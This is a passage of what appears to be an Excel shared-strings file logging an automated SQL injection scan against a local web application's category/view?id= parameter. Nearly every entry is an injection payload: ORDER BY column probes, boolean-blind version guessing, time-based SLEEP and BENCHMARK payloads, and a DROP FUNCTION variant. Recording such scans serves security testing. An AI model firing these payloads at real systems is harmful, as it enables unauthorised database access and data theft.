    <t>[ ORDER BY 25 ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:35 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2026%20</t>
  </si>
  <si>
    <t>[ ORDER BY 26 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2027%20</t>
  </si>
  <si>
    <t>[ ORDER BY 27 ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:36 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2028%20</t>
  </si>
  <si>
    <t>[ ORDER BY 28 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2029%20</t>
  </si>
  <si>
    <t>[ ORDER BY 29 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2030%20</t>
  </si>
  <si>
    <t>[ ORDER BY 30 ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:37 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2031337%20</t>
  </si>
  <si>
    <t>[ ORDER BY 31337 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4346=4346)%20THEN%200x61646d696e%20ELSE%200x28%20END))%20AND%20'Txws'='</t>
  </si>
  <si>
    <t>[ RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=']</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4346=4347)%20THEN%200x61646d696e%20ELSE%200x28%20END))%20AND%20'Txws'='</t>
  </si>
  <si>
    <t>[ RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=']</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:38 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3IF(7423=7424)%20SELECT%207423%20ELSE%20DROP%20FUNCTION%20xcjl--</t>
  </si>
  <si>
    <t>[IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3IF(7423=7423)%20SELECT%207423%20ELSE%20DROP%20FUNCTION%20xcjl--</t>
  </si>
  <si>
    <t>[IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:39 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%25'%20AND%208310=8310%20AND%20'%25'='</t>
  </si>
  <si>
    <t>Not Found</t>
  </si>
  <si>
    <t>[%' AND 8310=8310 AND '%'=']</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%25'%20AND%208310=8311%20AND%20'%25'='</t>
  </si>
  <si>
    <t>[%' AND 8310=8311 AND '%'=']</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,1,1))='X'</t>
  </si>
  <si>
    <t>[ and (select substring(@@version,1,1))='X']</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:40 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,1,1))='M'</t>
  </si>
  <si>
    <t>[ and (select substring(@@version,1,1))='M']</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,2,1))='i'</t>
  </si>
  <si>
    <t>[ and (select substring(@@version,2,1))='i']</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:41 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,2,1))='y'</t>
  </si>
  <si>
    <t>[ and (select substring(@@version,2,1))='y']</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,3,1))='c'</t>
  </si>
  <si>
    <t>[ and (select substring(@@version,3,1))='c']</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,3,1))='S'</t>
  </si>
  <si>
    <t>[ and (select substring(@@version,3,1))='S']</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,3,1))='X'</t>
  </si>
  <si>
    <t>[ and (select substring(@@version,3,1))='X']</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3sleep(5)%23</t>
  </si>
  <si>
    <t>[sleep(5)#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=31%20or%20sleep(5)%23</t>
  </si>
  <si>
    <t>[1 or sleep(5)#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%22%20or%20sleep(5)%23</t>
  </si>
  <si>
    <t>[" or sleep(5)#]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:16:22 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3or%20pg_SLEEP(5)--</t>
  </si>
  <si>
    <t>[or pg_SLEEP(5)--]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3or%20pg_SLEEP(5)%23</t>
  </si>
  <si>
    <t>[or pg_SLEEP(5)#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3'%5C%22</t>
  </si>
  <si>
    <t>['\"]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3AnD%20SLEEP(5)</t>
  </si>
  <si>
    <t>[AnD SLEEP(5)]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:16:23 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3AnD%20SLEEP(5)--</t>
  </si>
  <si>
    <t>[AnD SLEEP(5)--]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:16:28 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3AnD%20SLEEP(5)%23</t>
  </si>
  <si>
    <t>[AnD SLEEP(5)#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3&amp;&amp;SLEEP(5)</t>
  </si>
  <si>
    <t>[&amp;&amp;SLEEP(5)]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3&amp;&amp;SLEEP(5)--</t>
  </si>
  <si>
    <t>[&amp;&amp;SLEEP(5)--]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:16:29 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3&amp;&amp;SLEEP(5)%23</t>
  </si>
  <si>
    <t>[&amp;&amp;SLEEP(5)#]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:16:30 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3'%20AnD%20SLEEP(5)%20ANd%20'1</t>
  </si>
  <si>
    <t>[' AnD SLEEP(5) ANd '1]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3'&amp;&amp;SLEEP(5)&amp;&amp;'1</t>
  </si>
  <si>
    <t>['&amp;&amp;SLEEP(5)&amp;&amp;'1]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:28 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%20SLEEP(5)</t>
  </si>
  <si>
    <t>[ ORDER BY SLEEP(5)]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5)</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5)]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A'))</t>
  </si>
  <si>
    <t>###</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:29 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:30 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:31 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%20SLEEP(5)%23</t>
  </si>
  <si>
    <t>[ ORDER BY SLEEP(5)#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5)%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5)#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),3%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),3#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:32 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),3,4%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),3,4#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:33 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:34 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:35 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%20SLEEP(5)--%20</t>
  </si>
  <si>
    <t>[ ORDER BY SLEEP(5)-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5)--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5)-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:36 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),3--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),3-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:37 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),3,4--%20</t>
  </si>
  <si>
